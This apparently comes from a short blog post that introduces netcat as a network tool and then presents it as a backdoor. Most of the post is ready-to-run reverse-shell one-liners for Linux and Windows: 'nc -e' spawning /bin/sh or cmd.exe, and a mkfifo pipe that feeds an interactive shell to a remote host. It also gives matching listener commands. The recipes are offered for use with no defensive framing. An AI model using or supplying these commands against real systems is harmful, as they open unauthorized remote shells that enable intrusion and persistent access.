Jeet Kune Crypto: netcat (reverse shells)

One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.

While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:

Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>

If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:

mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket

If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:

nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>